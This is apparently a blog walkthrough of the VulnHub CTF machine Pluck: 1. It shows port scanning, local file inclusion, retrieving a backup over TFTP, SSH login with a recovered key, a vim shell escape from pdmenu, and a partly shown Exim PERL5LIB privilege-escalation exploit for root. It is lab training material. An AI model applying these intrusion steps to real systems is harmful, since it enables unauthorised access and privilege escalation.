Capture the flag (CTF)

Pluck: 1 CTF Walkthrough

June 8, 2017 by Chiragh Dewan

Pluck: 1 is a vulnerable machine created by Ryan Oberto. It surfaced on VulnHub on 11th March 2017. It can be downloaded from,178/

The file can be used with VMWare as well as VirtualBox. The machine is Linux based.

The objective is to read the flag present in the machine with root privileges.

Downloaded and fired up, it presents with a login screen with shows the target IP:

Since we have our target IP, let’s scan and see what we can find:

For this case, I am using Zenmap, a GUI version of Nmap. The scan shows us that there are three ports open:

  • Port 22 – Used for SSH
  • Port 80 – Used to serve a web application
  • Port 3306 – Running MySQL

Seeing that port 80 is open, my first instinct was to check what’s the server running:

Looking at the URL formed, it made me try to look for LFI (Local File Inclusion), and it worked:

Looking at the output, it talks about a user called backup-user whose job is to take periodic backups and store them. Let’s see what it shows us:

To get the backup.tar file, I used to connect with TFTP (Trivial File Transfer Protocol) and downloaded the backup.tar file:

$ tftp

tftp> connect

tftp> get backup.tar

tftp> quit

On extracting the contents of backup.tar, we see there are two folders:

  • Home
  • Var

$ tar -xvf backup.tar

On further examination, we see that the user Paul, has a few keys up his sleeves:

Let’s try to use them and see if any of them works. After trying a few, id_key4 showed the following:

$ ssh -I id_key4 paul@

Here, we are presented with pdmenu. To get to a shell, go on to Edit file and enter any file name. You will be presented with vim, and to exit to a shell, simply write:

:set shell =/bin/bash

and then type :shell to exit to a shell

Checking about the user and the system, we find:

Now to read the flag, we need to get root privilege. After doing some research, I found the following exploit ( Simply copying and pasting the following, gave us root:

cat > /tmp/ << EOF

package root;

use strict;

use warnings;



PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

and voila, we have the flag:

Posted: June 8, 2017
Chiragh Dewan
View Profile

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/ Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security including at an TEDx event.